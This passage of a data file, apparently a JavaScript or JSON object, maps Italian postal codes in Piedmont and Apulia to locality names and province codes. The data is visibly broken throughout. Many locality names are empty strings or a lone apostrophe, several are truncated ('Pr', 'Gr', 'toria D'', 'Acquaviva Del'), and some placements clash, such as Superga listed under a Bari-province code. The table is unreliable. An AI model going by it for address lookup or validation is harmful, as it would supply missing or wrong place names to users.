["Fossano", "CN"], ["Maddalene", "CN"], ], "12046": [["", "CN"], ["Monta'", "CN"], ["San Rocco Monta'", "CN"]], "12047": [["", "CN"], ["Crava", "CN"]], "12048": [["", "CN"]], "12049": [["Trinita'", "CN"]], "12050": [ ["Feisoglio", "CN"], ["Baraccone", "CN"], ["", "CN"], ["", "CN"], ["", "CN"], ["Guarene", "CN"], ["", "CN"], ["Castagnito", "CN"], ["Neviglie", "CN"], ["Borgomale", "CN"], ["Treiso", "CN"], ["", "CN"], ["Arguello", "CN"], ["Rodello", "CN"], ["Sinio", "CN"], ["Castellinaldo", "CN"], ["Benevello", "CN"], ["", "CN"], ["Sant'Antonio", "CN"], ["", "CN"], ["Barbaresco", "CN"], ["", "CN"], ["", "CN"], ["Vaccheria", "CN"], ["", "CN"], ["", "CN"], ["", "CN"], ["Castelrotto", "CN"], ["Cravanzana", "CN"], ["Castino", "CN"], ["Bosia", "CN"], ["", "CN"], ["Roddino", "CN"], ["Cissone", "CN"], ], "12051": [["Mussotto", "CN"], ["Alba", "CN"]], "12052": [["Neive", "CN"], ["", "CN"], ["Borgonovo", "CN"]], "12053": [["", "CN"], ["", "CN"]], "12054": [["", "CN"], ["", "CN"]], "12055": [["", "CN"], ["", "CN"], ["", "CN"], ["Ricca", "CN"]], "12056": [["San Donato", "CN"], ["", "CN"], ["Mango", "CN"]], "12058": [["Camo", "CN"], ["Valdivilla", "CN"], ["", "CN"]], "12060": [ ["", "CN"], ["", "CN"], ["Bossolasco", "CN"], ["Farigliano", "CN"], ["", "CN"], ["Clavesana", "CN"], ["Somano", "CN"], ["Roddi", "CN"], ["", "CN"], ["", "CN"], ["", "CN"], ["Marsaglia", "CN"], ["", "CN"], ["Piozzo", "CN"], ["", "CN"], ["Macellai", "CN"], ["Igliano", "CN"], ["", "CN"], ["Barolo", "CN"], ["", "CN"], ["Gallo", "CN"], ["Verduno", "CN"], ["'", "CN"], ["'", "CN"], ["Bonvicino", "CN"], ["Ciglie'", "CN"], ["Murazzano", "CN"], ["", "CN"], ["Pocapaglia", "CN"], ["Novello", "CN"], ["Monchiero", "CN"], ], "12061": [["Carru'", "CN"]], "12062": [["", "CN"], ["Cherasco", "CN"], ["Roreto", "CN"]], "12063": [["Dogliani", "CN"]], "12064": [["Rivalta", "CN"], ["", "CN"]], "12065": [["Perno", "CN"], ["", "CN"]], "12066": [["Borgo", "CN"], ["", "CN"]], "12068": [["Narzole", "CN"]], "12069": [ ["Cinzano", "CN"], ["Villa", "CN"], ["toria D'", "CN"], ["Santa Vittoria D'Alba", "CN"], ], "12070": [ ["Montezemolo", "CN"], ["Perlo", "CN"], ["Mombarcaro", "CN"], ["Priero", "CN"], ["Bragioli", "CN"], ["Viola", "CN"], ["Nucetto", "CN"], ["Lisio", "CN"], ["Paroldo", "CN"], ["", "CN"], ["Scagnello", "CN"], ["Alto", "CN"], ["", "CN"], ["Sale San Giovanni", "CN"], ["Gorzegno", "CN"], ["Levice", "CN"], ["Castelnuovo Di Ceva", "CN"], ["", "CN"], ["Gottasecca", "CN"], ["Priola", "CN"], ["Torresina", "CN"], ["Sale Delle Langhe", "CN"], ["Battifollo", "CN"], ["Perletto", "CN"], ["Caprauna", "CN"], ["Mombasiglio", "CN"], ], "12072": [["Camerana", "CN"]], "12073": [["Ceva", "CN"], ["Roascio", "CN"]], "12074": [["Bergolo", "CN"], ["Cortemilia", "CN"]], "12075": [ ["Garessio", "CN"], ["", "CN"], ["Cerisola", "CN"], ["", "CN"], ["Trappa", "CN"], ], "12076": [["Lesegno", "CN"]], "12077": [["Prunetto", "CN"], ["Monesiglio", "CN"]], "12078": [["Ormea", "CN"], ["", "CN"]], "12079": [["Saliceto", "CN"]], "12080": [ ["Pra'", "CN"], ["'", "CN"], ["Monasterolo Casotto", "CN"], ["Monastero Di Vasco", "CN"], ["Vicoforte", "CN"], ["Santuario Di Vicoforte", "CN"], ["", "CN"], ["Roburent", "CN"], ["'", "CN"], ["'", "CN"], ["Briaglia", "CN"], ["Pianfei", "CN"], ["Moline", "CN"], ["", "CN"], ], "12081": [["Beinette", "CN"]], "12082": [["Frabosa Soprana", "CN"], ["Bossea", "CN"], ["Fontane", "CN"], ["Corsaglia", "CN"]], "12083": [["", "CN"], ["Gosi", "CN"], ["Frabosa Sottana", "CN"]], "12084": [ ["Pogliola", "CN"], ["Breo", "CN"], ["Gratteria", "CN"], ["Breolungi", "CN"], ["", "CN"], ["Piazza", "CN"], ["'", "CN"], ["Pascomonti", "CN"], ["Mondovi'", "CN"], ], "12087": [["Valcasotto", "CN"], ["Pamparato", "CN"], ["Serra", "CN"], ["Serra Pamparato", "CN"]], "12088": [["'", "CN"], ["Lurisia", "CN"], ["Prea", "CN"], ["Prea Di Roccaforte", "CN"]], "12089": [["'", "CN"]], "12100": [ ["", "CN"], ["Passatore", "CN"], ["", "CN"], ["", "CN"], ["", "CN"], ["San ", "CN"], ["Confreria", "CN"], ["", "CN"], ["Spinetta", "CN"], ["'Olmo", "CN"], ["Ronchi", "CN"], ["Cuneo", "CN"], ["", "CN"], ], "28010": [ ["", "NO"], ["Boca", "NO"], ["Bogogno", "NO"], ["Cavallirio", "NO"], ["Revislate", "NO"], ["", "NO"], ["Miasino", "NO"], ["Gargallo", "NO"], ["Alzo", "NO"], ["Soriso", "NO"], ["", "NO"], ["Cavaglietto", "NO"], ["Pisano", "NO"], ["Sologno", "NO"], ["Barengo", "NO"], ["Ameno", "NO"], ["", "NO"], ["", "NO"], ["Nebbiuno", "NO"], ["Caltignaga", "NO"], ["", "NO"], ["Pella", "NO"], ["Divignano", "NO"], ["Colazza", "NO"], ], "28011": [["Coiromonte", "NO"], ["Armeno", "NO"], ["Sovazza", "NO"]], "28012": [["Cressa", "NO"]], "28013": [["Veruno", "NO"], ["Gattico", "NO"]], "28014": [["Maggiora", "NO"]], "28015": [["Momo", "NO"]], "28016": [["", "NO"], ["", "NO"], ["", "NO"]], "28017": [["", "NO"]], "28019": [["Suno", "NO"], ["Baraggia", "NO"]], "28021": [ ["Borgomanero", "NO"], ["", "NO"], ["", "NO"], ["", "NO"], ], "28024": [["Gozzano", "NO"]], "28028": [["Pratolungo", "NO"], ["Pettenasco", "NO"]], "28040": [ ["", "NO"], ["Lesa", "NO"], ["Dormelletto", "NO"], ["Paruzzaro", "NO"], ["", "NO"], ["Mezzomerico", "NO"], ["", "NO"], ["", "NO"], ["", "NO"], ], "28041": [["Arona", "NO"], ["Dagnente", "NO"], ["Mercurago", "NO"]], "28043": [["", "NO"]], "28045": [["Invorio", "NO"]], "28046": [["Ghevio", "NO"], ["Meina", "NO"]], "28047": [["Oleggio", "NO"], ["Fornaci", "NO"]], "28050": [["Pombia", "NO"]], "28053": [["", "NO"]], "28060": [ ["Vinzaglio", "NO"], ["", "NO"], ["Casalvolone", "NO"], ["Granozzo", "NO"], ["", "NO"], ["", "NO"], ["", "NO"], ["Orfengo", "NO"], ["Nibbia", "NO"], ["", "NO"], ["Sozzago", "NO"], ["Cameriano", "NO"], ["Vicolungo", "NO"], ["Cureggio", "NO"], ["Casalbeltrame", "NO"], ["Recetto", "NO"], ["", "NO"], ["Comignago", "NO"], ["Casalino", "NO"], ], "28061": [["Biandrate", "NO"]], "28062": [["", "NO"], ["Cameri", "NO"]], "28064": [["Sillavengo", "NO"], ["", "NO"], ["Landiona", "NO"]], "28065": [["Cerano", "NO"]], "28066": [["Galliate", "NO"]], "28068": [["Romentino", "NO"]], "28069": [["Trecate", "NO"]], "28070": [ ["Sizzano", "NO"], ["", "NO"], ["Nibbiola", "NO"], ["Tornaco", "NO"], ["Terdobbiate", "NO"], ], "28071": [["Borgolavezzaro", "NO"]], "28072": [["San Bernardino", "NO"], ["Briona", "NO"]], "28073": [["", "NO"]], "28074": [["Ghemme", "NO"]], "28075": [["Grignasco", "NO"]], "28076": [["Pogno", "NO"]], "28077": [["Pr", "NO"]], "28078": [["", "NO"]], "28079": [["Vespolate", "NO"]], "28100": [ ["Veveri", "NO"], ["Vignale", "NO"], ["Olengo", "NO"], ["", "NO"], ["", "NO"], ["Agognate", "NO"], ["Sant'Agabio", "NO"], ["Casalgiate", "NO"], ["Novara", "NO"], ["Lumellogno", "NO"], ["Pernate", "NO"], ], "10010": [ ["", "TO"], ["", "TO"], ["Banchette", "TO"], ["Lessolo", "TO"], ["Bairo", "TO"], ["", "TO"], ["Parella", "TO"], ["Tavagnasco", "TO"], ["", "TO"], ["Nomaglio", "TO"], ["", "TO"], ["Quagliuzzo", "TO"], ["", "TO"], ["", "TO"], ["Burolo", "TO"], ["Calea", "TO"], ["Mercenasco", "TO"], ["Quassolo", "TO"], ["", "TO"], ["Masino", "TO"], ["Andrate", "TO"], ["", "TO"], ["Quincinetto", "TO"], ["Strambinello", "TO"], ["", "TO"], ["Carema", "TO"], ["Azeglio", "TO"], ["Gauna", "TO"], ["Piverone", "TO"], ["", "TO"], ["", "TO"], ["", "TO"], ["Villate", "TO"], ["", "TO"], ["", "TO"], ["Caravino", "TO"], ["Scarmagno", "TO"], ["Chiaverano", "TO"], ["Loranze'", "TO"], ["Rueglio", "TO"], ], "10011": [["Aglie'", "TO"]], "10012": [["Bollengo", "TO"]], "10013": [["", "TO"], ["", "TO"]], "10014": [["Caluso", "TO"], ["", "TO"], ["Vallo", "TO"], ["Are'", "TO"], ["Rodallo", "TO"]], "10015": [["", "TO"], ["", "TO"], ["Ivrea", "TO"]], "10016": [["", "TO"]], "10017": [["Montanaro", "TO"]], "10018": [["", "TO"]], "10019": [["Strambino", "TO"], ["Cerone", "TO"], ["Carrone", "TO"]], "10020": [ ["", "TO"], ["", "TO"], ["Marcorengo", "TO"], ["Cavagnolo", "TO"], ["Colombaro", "TO"], ["", "TO"], ["", "TO"], ["Brusasco", "TO"], ["", "TO"], ["", "TO"], ["", "TO"], ["Arignano", "TO"], ["", "TO"], ["Lauriano", "TO"], ["", "TO"], ["Brozolo", "TO"], ["Pavarolo", "TO"], ["Marentino", "TO"], ["Andezeno", "TO"], ["", "TO"], ["Cambiano", "TO"], ["", "TO"], ["Casalborgone", "TO"], ["Rivodora", "TO"], ], "10022": [ ["Cavalleri", "TO"], ["Carmagnola", "TO"], ["Fumeri", "TO"], ["", "TO"], ["", "TO"], ["", "TO"], ], "10023": [["Chieri", "TO"], ["Pessione", "TO"]], "10024": [ ["Moncalieri", "TO"], ["Revigliasco", "TO"], ["Tagliaferro", "TO"], ["Barauda", "TO"], ["", "TO"], ["Testona", "TO"], ["", "TO"], ["", "TO"], ], "10025": [["", "TO"]], "10026": [["Santena", "TO"]], "10028": [["", "TO"], ["Trofarello", "TO"]], "10029": [["Villastellone", "TO"]], "10030": [ ["Maglione", "TO"], ["Vische", "TO"], ["Tina", "TO"], ["Rondissone", "TO"], ["Vestigne'", "TO"], ["Villareggia", "TO"], ], "10031": [["Borgomasino", "TO"]], "10032": [["Brandizzo", "TO"]], "10034": [["Boschetto", "TO"], ["Chivasso", "TO"], ["Torassi", "TO"], ["Castelrosso", "TO"]], "10035": [["Casale", "TO"], ["Mazze'", "TO"], ["'", "TO"]], "10036": [["Olimpia", "TO"], ["", "TO"]], "10037": [["", "TO"]], "10038": [["Verolengo", "TO"], ["Casabianca", "TO"], ["", "TO"]], "10039": [["Pecco", "TO"], ["Lugnacco", "TO"], ["", "TO"]], "10040": [ ["", "TO"], ["Rivarossa", "TO"], ["Rivera", "TO"], ["", "TO"], ["Milanere", "TO"], ["Tedeschi", "TO"], ["", "TO"], ["Givoletto", "TO"], ["", "TO"], ["Caselette", "TO"], ["Gerbole", "TO"], ["Montelera", "TO"], ["Zucche", "TO"], ["Druento", "TO"], ["Rubiana", "TO"], ["Cumiana", "TO"], ["", "TO"], ["Leini'", "TO"], ["Lombardore", "TO"], ["Almese", "TO"], ["Novaretto", "TO"], ["", "TO"], ["", "TO"], ["Brione", "TO"], ["", "TO"], ["Osasio", "TO"], ["Caprie", "TO"], ["Pralormo", "TO"], ["Lombriasco", "TO"], ["Volvera", "TO"], ], "10041": [["Carignano", "TO"], ["", "TO"], ["Ceretto", "TO"]], "10042": [["Stupinigi", "TO"], ["Nichelino", "TO"]], "10043": [["Orbassano", "TO"]], "10044": [["Pianezza", "TO"]], "10045": [["Piossasco", "TO"], ["Garola", "TO"]], "10046": [["Marocchi", "TO"], ["Avatanei", "TO"], ["Isolabella", "TO"], ["Poirino", "TO"], ["Favari", "TO"]], "10048": [["Vinovo", "TO"], ["Garino", "TO"]], "10050": [ ["", "TO"], ["Coazze", "TO"], ["", "TO"], ["", "TO"], ["Chiomonte", "TO"], ["", "TO"], ["Baratte", "TO"], ["Chianocco", "TO"], ["Vernetto", "TO"], ["", "TO"], ["Novalesa", "TO"], ["", "TO"], ["Zoie", "TO"], ["Claviere", "TO"], ["", "TO"], ["Giaglione", "TO"], ["Venaus", "TO"], ["", "TO"], ["Mattie", "TO"], ["Gravere", "TO"], ["", "TO"], ["Exilles", "TO"], ["Vaie", "TO"], ["", "TO"], ["Moncenisio", "TO"], ["Salbertrand", "TO"], ["Bruzolo", "TO"], ], "10051": [["Drubiaglio", "TO"], ["Grangia", "TO"], ["Avigliana", "TO"]], "10052": [["Bardonecchia", "TO"], ["", "TO"]], "10053": [["Foresto", "TO"], ["Bussoleno", "TO"]], "10054": [["Bousson", "TO"], ["", "TO"], ["Solomiac", "TO"], ["", "TO"]], "10055": [["Condove", "TO"]], "10056": [["Beaulard", "TO"], ["Oulx", "TO"]], "10057": [["", "TO"]], "10058": [["Sestriere", "TO"], ["", "TO"]], "10059": [["Mompantero", "TO"], ["", "TO"], ["Susa", "TO"]], "10060": [ ["Bibiana", "TO"], ["Bricherasio", "TO"], ["", "TO"], ["Rora'", "TO"], ["Combalere", "TO"], ["Cantalupa", "TO"], ["Airasca", "TO"], ["Roletto", "TO"], ["", "TO"], ["Pragelato", "TO"], ["Campiglione", "TO"], ["Scalenghe", "TO"], ["", "TO"], ["Macello", "TO"], ["Pancalieri", "TO"], ["Mentoulles", "TO"], ["None", "TO"], ["Villaretto", "TO"], ["Candiolo", "TO"], ["", "TO"], ["Roure", "TO"], ["Perrero", "TO"], ["Dubbione", "TO"], ["Piscina", "TO"], ["Prarostino", "TO"], ["Angrogna", "TO"], ["Miradolo", "TO"], ["Garzigliana", "TO"], ["Frossasco", "TO"], ["Massello", "TO"], ["", "TO"], ["Roreto", "TO"], ["Riclaretto", "TO"], ["", "TO"], ["", "TO"], ["", "TO"], ["Buriasco", "TO"], ["Viotto", "TO"], ["Prali", "TO"], ["Osasco", "TO"], ["", "TO"], ["Fenestrelle", "TO"], ["Pinasca", "TO"], ["Castelnuovo", "TO"], ["", "TO"], ["Cercenasco", "TO"], ["", "TO"], ["", "TO"], ["Usseaux", "TO"], ["Porte", "TO"], ["Lusernetta", "TO"], ["", "TO"], ], "10061": [["Cavour", "TO"]], "10062": [["Airali", "TO"], ["Luserna", "TO"], ["", "TO"]], "10063": [["", "TO"], ["Pomaretto", "TO"]], "10064": [["", "TO"], ["", "TO"], ["Pinerolo", "TO"], ["Baudenasca", "TO"]], "10065": [["", "TO"], ["Pramollo", "TO"]], "10066": [["", "TO"]], "10067": [["Vigone", "TO"]], "10068": [["", "TO"]], "10069": [["", "TO"]], "10070": [ ["Fiano", "TO"], ["Levone", "TO"], ["", "TO"], ["Benne", "TO"], ["", "TO"], ["", "TO"], ["Front", "TO"], ["", "TO"], ["", "TO"], ["", "TO"], ["", "TO"], ["", "TO"], ["Ceres", "TO"], ["'", "TO"], ["Varisella", "TO"], ["Corio", "TO"], ["Mezzenile", "TO"], ["Cantoira", "TO"], ["", "TO"], ["Mondrone", "TO"], ["", "TO"], ["", "TO"], ["Lemie", "TO"], ["", "TO"], ["Bonzo", "TO"], ["Pessinetto", "TO"], ["Germagnano", "TO"], ["Balangero", "TO"], ["Monasterolo", "TO"], ["Cafasse", "TO"], ["Traves", "TO"], ["Viu'", "TO"], ["Procaria", "TO"], ["", "TO"], ["Groscavallo", "TO"], ["Grosso", "TO"], ["Usseglio", "TO"], ["", "TO"], ["Balme", "TO"], ["Robassomero", "TO"], ["Barbania", "TO"], ["Chialamberto", "TO"], ], "10071": [["", "TO"]], "10072": [["", "TO"], ["Mappano", "TO"]], "10073": [["Devesi", "TO"], ["Cirie'", "TO"]], "10074": [["", "TO"]], "10075": [["Mathi", "TO"]], "10076": [["", "TO"], ["Nole", "TO"]], "10077": [["Malanghero", "TO"], ["", "TO"], ["", "TO"]], "10078": [["", "TO"], ["Altessano", "TO"]], "10080": [ ["Rosone", "TO"], ["Ciconio", "TO"], ["", "TO"], ["Sparone", "TO"], ["Lusiglie'", "TO"], ["", "TO"], ["Oglianico", "TO"], ["", "TO"], ["Cintano", "TO"], ["Fornolosa", "TO"], ["Alpette", "TO"], ["Drusacco", "TO"], ["Pratiglione", "TO"], ["Ozegna", "TO"], ["Traversella", "TO"], ["Casetti", "TO"], ["Ingria", "TO"], ["", "TO"], ["", "TO"], ["Vistrorio", "TO"], ["", "TO"], ["", "TO"], ["Ribordone", "TO"], ["Bosconero", "TO"], ["Canischio", "TO"], ["Salassa", "TO"], ["Brosso", "TO"], ["Noasca", "TO"], ["Locana", "TO"], ["", "TO"], ["Frassinetto", "TO"], ["Pertusio", "TO"], ["Prascorsano", "TO"], ["Vidracco", "TO"], ["Chiesanuova", "TO"], ["Feletto", "TO"], ["Issiglio", "TO"], ["", "TO"], ["Busano", "TO"], ["", "TO"], ["Rivara", "TO"], ["Borgiallo", "TO"], ], "10081": [ ["", "TO"], ["", "TO"], ["Muriaglio", "TO"], ["Castellamonte", "TO"], ], "10082": [["Priacco", "TO"], ["", "TO"], ["Cuorgne'", "TO"]], "10083": [["Favria", "TO"]], "10084": [["", "TO"]], "10085": [["", "TO"]], "10086": [["Argentera", "TO"], ["", "TO"]], "10087": [["Valperga", "TO"]], "10088": [["Volpiano", "TO"]], "10089": [["", "TO"], ["Trausella", "TO"], ["Meugliano", "TO"]], "10090": [ ["", "TO"], ["", "TO"], ["Bussolino", "TO"], ["Sciolze", "TO"], ["Rivalba", "TO"], ["", "TO"], ["", "TO"], ["Trana", "TO"], ["Cinzano", "TO"], ["Foglizzo", "TO"], ["Sangano", "TO"], ["Bruino", "TO"], ["", "TO"], ["Reano", "TO"], ["Cuceglio", "TO"], ["Vialfre'", "TO"], ["", "TO"], ["", "TO"], ["", "TO"], ["Villarbasse", "TO"], ["", "TO"], ["Montalenghe", "TO"], ["", "TO"], ["Rosta", "TO"], ["Corbiglia", "TO"], ["", "TO"], ["Ferriera", "TO"], ], "10091": [["Alpignano", "TO"]], "10092": [["Borgaretto", "TO"], ["Beinasco", "TO"]], "10093": [ ["Leumann", "TO"], ["Savonera", "TO"], ["Collegno", "TO"], ["", "TO"], ["", "TO"], ], "10094": [["Valgioie", "TO"], ["Pontepietra", "TO"], ["Giaveno", "TO"], ["Selvaggio", "TO"]], "10095": [["Gerbido", "TO"], ["Lesna", "TO"], ["Grugliasco", "TO"]], "10098": [["", "TO"], ["Rivoli", "TO"], ["Bruere", "TO"], ["", "TO"]], "10099": [["", "TO"]], "10100": [["Torino", "TO"]], "10121": [["Torino", "TO"]], "10122": [["Torino", "TO"]], "10123": [["Torino", "TO"]], "10124": [["Torino", "TO"]], "10125": [["Torino", "TO"]], "10126": [["Torino", "TO"]], "10127": [["Torino", "TO"]], "10128": [["Torino", "TO"]], "10129": [["Torino", "TO"]], "10131": [["Torino", "TO"]], "10132": [["Superga", "TO"], ["Torino", "TO"]], "10133": [["Torino", "TO"], ["Cavoretto", "TO"]], "10134": [["Torino", "TO"]], "10135": [["Torino", "TO"]], "10136": [["Torino", "TO"]], "10137": [["Torino", "TO"]], "10138": [["Torino", "TO"]], "10139": [["Torino", "TO"]], "10141": [["Torino", "TO"]], "10142": [["Torino", "TO"]], "10143": [["Torino", "TO"]], "10144": [["Torino", "TO"]], "10145": [["Torino", "TO"]], "10146": [["Torino", "TO"]], "10147": [["Torino", "TO"]], "10148": [["Torino", "TO"]], "10149": [["Torino", "TO"]], "10151": [["Torino", "TO"]], "10152": [["Torino", "TO"]], "10153": [["Torino", "TO"]], "10154": [["Torino", "TO"]], "10155": [["Torino", "TO"]], "10156": [["", "TO"], ["Torino", "TO"], ["Falchera", "TO"]], "28801": [["Cossogno", "VB"]], "28802": [["Albo", "VB"], ["Mergozzo", "VB"]], "28803": [["", "VB"], ["Cuzzago", "VB"]], "28804": [["", "VB"], ["Bieno", "VB"]], "28805": [["Vogogna", "VB"]], "28811": [["Cissano", "VB"], ["Cresseglio", "VB"], ["Arizzano", "VB"]], "28812": [["Aurano", "VB"]], "28813": [["Bee", "VB"]], "28814": [["Cambiasca", "VB"]], "28815": [["Caprezzo", "VB"]], "28816": [["Intragna", "VB"]], "28817": [["Miazzina", "VB"]], "28818": [["Premeno", "VB"]], "28819": [["Vignone", "VB"]], "28821": [["", "VB"]], "28822": [["Cannobio", "VB"]], "28823": [["Ghiffa", "VB"], ["Susello", "VB"], ["Cargiago", "VB"]], "28824": [["Gonte", "VB"], ["Oggebbio", "VB"]], "28825": [["", "VB"]], "28826": [["", "VB"]], "28827": [["", "VB"], ["", "VB"], ["Falmenta", "VB"], ["Airetta", "VB"]], "28828": [["Gurro", "VB"]], "28831": [["", "VB"], ["Feriolo", "VB"], ["Baveno", "VB"]], "28832": [["Belgirate", "VB"]], "28833": [["", "VB"]], "28836": [["Gignese", "VB"], ["Vezzo", "VB"]], "28838": [ ["Binda", "VB"], ["Levo", "VB"], ["Carciano", "VB"], ["", "VB"], ["Magognino", "VB"], ["Stresa", "VB"], ], "28841": [["", "VB"], ["Antronapiana", "VB"]], "28842": [["Fonti", "VB"], ["", "VB"], ["Bognanco", "VB"]], "28843": [["Montescheno", "VB"]], "28844": [["Villadossola", "VB"]], "28845": [["Domodossola", "VB"]], "28846": [["Viganella", "VB"], ["Seppiana", "VB"]], "28851": [["Cuzzego", "VB"], ["Beura", "VB"], ["", "VB"]], "28852": [["Craveggia", "VB"], ["Vocogno", "VB"]], "28853": [["Druogno", "VB"]], "28854": [["Malesco", "VB"], ["Zornasco", "VB"], ["Finero", "VB"]], "28855": [["Masera", "VB"]], "28856": [["Re", "VB"], ["Villette", "VB"]], "28857": [["", "VB"]], "28858": [["Toceno", "VB"]], "28859": [["Trontano", "VB"]], "28861": [["Baceno", "VB"]], "28862": [["Crodo", "VB"]], "28863": [["Formazza", "VB"]], "28864": [["Roldo", "VB"], ["Montecrestese", "VB"], ["Pontetto", "VB"]], "28865": [["Preglia", "VB"], ["Crevoladossola", "VB"]], "28866": [["Premia", "VB"], ["", "VB"]], "28868": [["Iselle", "VB"], ["Trasquera", "VB"], ["Varzo", "VB"]], "28871": [["", "VB"]], "28873": [["", "VB"], ["", "VB"], ["Castiglione", "VB"]], "28875": [["", "VB"]], "28876": [["Pestarena", "VB"], ["Borca", "VB"], ["", "VB"], ["Macugnaga", "VB"]], "28877": [["", "VB"], ["Ornavasso", "VB"]], "28879": [["", "VB"], ["", "VB"]], "28881": [ ["Cereda", "VB"], ["Ramate", "VB"], ["Sant'Anna", "VB"], ["", "VB"], ["Gabbio", "VB"], ["", "VB"], ], "28883": [["Granerolo", "VB"], ["", "VB"], ["Pedemonte", "VB"]], "28884": [["Pallanzeno", "VB"]], "28885": [["Piedimulera", "VB"]], "28886": [["", "VB"]], "28887": [ ["Cireggio", "VB"], ["Crusinallo", "VB"], ["Omegna", "VB"], ["Bagnella", "VB"], ["Germagno", "VB"], ["Agrano", "VB"], ], "28891": [["Nonio", "VB"], ["Cesara", "VB"]], "28893": [["Loreglia", "VB"]], "28894": [["", "VB"]], "28895": [["", "VB"], ["Massiola", "VB"]], "28896": [["", "VB"]], "28897": [["Fornero", "VB"], ["Luzzogno", "VB"], ["Valstrona", "VB"], ["Sambughetto", "VB"]], "28898": [["", "VB"]], "28899": [["Arola", "VB"]], "28922": [["Verbania", "VB"]], "13010": [ ["Civiasco", "VC"], ["Caresana", "VC"], ["Postua", "VC"], ["Villata", "VC"], ["Guardabosone", "VC"], ["Motta De' Conti", "VC"], ["Stroppiana", "VC"], ["Pezzana", "VC"], ], "13011": [["", "VC"], ["Isolella", "VC"], ["Borgosesia", "VC"]], "13012": [["", "VC"], ["Prarolo", "VC"]], "13017": [["Quarona", "VC"], ["Doccio", "VC"]], "13018": [["Valduggia", "VC"], ["Zuccaro", "VC"]], "13019": [["Morca", "VC"], ["Valmaggia", "VC"], ["Varallo", "VC"], ["Roccapietra", "VC"]], "13020": [ ["Sabbia", "VC"], ["Mollia", "VC"], ["Balmuccia", "VC"], ["Rimella", "VC"], ["Breia", "VC"], ["Rassa", "VC"], ["Vocca", "VC"], ["Rossa", "VC"], ["Piode", "VC"], ["Cravagliana", "VC"], ["Ferrera", "VC"], ["", "VC"], ["Pila", "VC"], ], "13021": [["", "VC"], ["", "VC"]], "13022": [["Fervento", "VC"], ["Boccioleto", "VC"]], "13023": [["Campertogno", "VC"]], "13024": [["Cellio", "VC"]], "13025": [["Fobello", "VC"], ["Cervatto", "VC"]], "13026": [["Carcoforo", "VC"], ["", "VC"], ["Rimasco", "VC"]], "13027": [["Scopa", "VC"]], "13028": [["Scopello", "VC"]], "13030": [ ["", "VC"], ["", "VC"], ["Villarboit", "VC"], ["Rive", "VC"], ["Oldenico", "VC"], ["Ghislarengo", "VC"], ["Greggio", "VC"], ["Caresanablot", "VC"], ["", "VC"], ["Collobiano", "VC"], ["Pertengo", "VC"], ["", "VC"], ["Formigliana", "VC"], ], "13031": [["Arborio", "VC"]], "13032": [["", "VC"]], "13033": [["Costanzana", "VC"]], "13034": [["Desana", "VC"], ["Lignana", "VC"]], "13035": [["Lenta", "VC"]], "13036": [["Ronsecco", "VC"]], "13037": [["", "VC"], ["Vintebbio", "VC"], ["", "VC"]], "13038": [["Tricerro", "VC"]], "13039": [["Trino", "VC"]], "13040": [ ["Crova", "VC"], ["Moncrivello", "VC"], ["Buronzo", "VC"], ["", "VC"], ["Rovasenda", "VC"], ["", "VC"], ["", "VC"], ["Salasco", "VC"], ["", "VC"], ["", "VC"], ["Saluggia", "VC"], ["", "VC"], ["Balocco", "VC"], ["Sant'Antonino", "VC"], ["Carisio", "VC"], ], "13041": [["Bianze'", "VC"]], "13043": [["Cigliano", "VC"]], "13044": [["Crescentino", "VC"], ["", "VC"], ["", "VC"]], "13045": [["Lozzolo", "VC"], ["Gattinara", "VC"]], "13046": [["Lamporo", "VC"], ["", "VC"]], "13047": [["Olcenengo", "VC"], ["", "VC"]], "13048": [["Santhia'", "VC"]], "13049": [["", "VC"]], "13060": [["", "VC"], ["Roasio", "VC"], ["Sant'Eusebio", "VC"]], "13100": [ ["Vercelli", "VC"], ["Cappuccini", "VC"], ["Prarolo", "VC"], ["Lignana", "VC"], ["Brarola", "VC"], ["Larizzate", "VC"], ], "70010": [ ["Capurso", "BA"], ["Adelfia", "BA"], ["", "BA"], ["", "BA"], ["Cellamare", "BA"], ["Locorotondo", "BA"], ["Casamassima", "BA"], ["", "BA"], ["", "BA"], ["Superga", "BA"], ["Turi", "BA"], ["Valenzano", "BA"], ["", "BA"], ["Trito", "BA"], ], "70011": [["Coreggia", "BA"], ["Alberobello", "BA"]], "70013": [["", "BA"]], "70014": [["Triggianello", "BA"], ["Conversano", "BA"]], "70015": [["Lamadacqua", "BA"], ["Noci", "BA"]], "70016": [["Parchitello", "BA"], ["Noicattaro", "BA"], ["", "BA"]], "70017": [["San Michele In Monte Laureto", "BA"], ["Putignano", "BA"], ["San Pietro Piturno", "BA"]], "70018": [["Rutigliano", "BA"]], "70019": [["Triggiano", "BA"]], "70020": [ ["Bitetto", "BA"], ["", "BA"], ["Poggiorsini", "BA"], ["Binetto", "BA"], ["Bitritto", "BA"], ["Toritto", "BA"], ], "70021": [["Acquaviva Del", "BA"]], "70022": [["Altamura", "BA"], ["Curtaniello", "BA"], ["Parisi", "BA"]], "70023": [["Murgia", "BA"], ["", "BA"]], "70024": [["Gravina In Puglia", "BA"], ["Murgetta", "BA"], ["Dolcecanto", "BA"], ["La Murgetta", "BA"]], "70025": [["Gr", "BA"]], "70026": [["Modugno", "BA"]], "70027": [["Palo Del Colle", "BA"]], "70028": [["", "BA"]], "70029": [["Santeramo In Colle", "BA"]], "70032": [["Bitonto", "BA"], ["Mariotto", "BA"], ["Palombaio", "BA"]], "70033": [["Corato", "BA"]], "70037": [["", "BA"]], "70038": [["Terlizzi", "BA"]], "70042": [["", "BA"], ["", "BA"], ["Cozze", "BA"]], "70043": [ ["Antonelli", "BA"], ["Impalata", "BA"], ["Lamalunga", "BA"], ["Gorgofreddo", "BA"], ["Cozzana", "BA"], ["", "BA"], ["", "BA"], ["Monopoli", "BA"], ], "70044": [["", "BA"]], "70054": [["Giovinazzo", "BA"]], "70056": [["Molfetta", "BA"]], "70100": [["Bari", "BA"]], "70121": [["Bari", "BA"]], "70122": [["Bari", "BA"]], "70123": [ ["Bari", "BA"], ["", "BA"], ["Fesca", "BA"], ["", "BA"], ["Stanic", "BA"], ["", "BA"], ["", "BA"], ], "70124": [["Picone", "BA"], ["", "BA"], ["Bari", "BA"]], "70125": [["Bari", "BA"], ["", "BA"], ["Carrassi", "BA"]], "70126": [["Mungivacca", "BA"], ["Japigia", "BA"], ["Bari", "BA"], ["", "BA"]], "70127": [["Santo Spirito", "BA"]], "70128": [["Palese", "BA"]], "70129": [["Loseto", "BA"], ["", "BA"]], "70131": [["", "BA"]], "72012": [["Carovigno", "BR"], ["", "BR"], ["Serranova", "BR"]], "72013": [["", "BR"]], "72014": [["Cisternino", "BR"], ["Caranna", "BR"], ["Casalini", "BR"]], "72015": [ ["Savelletri", "BR"], ["", "BR"], ["Montalbano", "BR"], ["", "BR"], 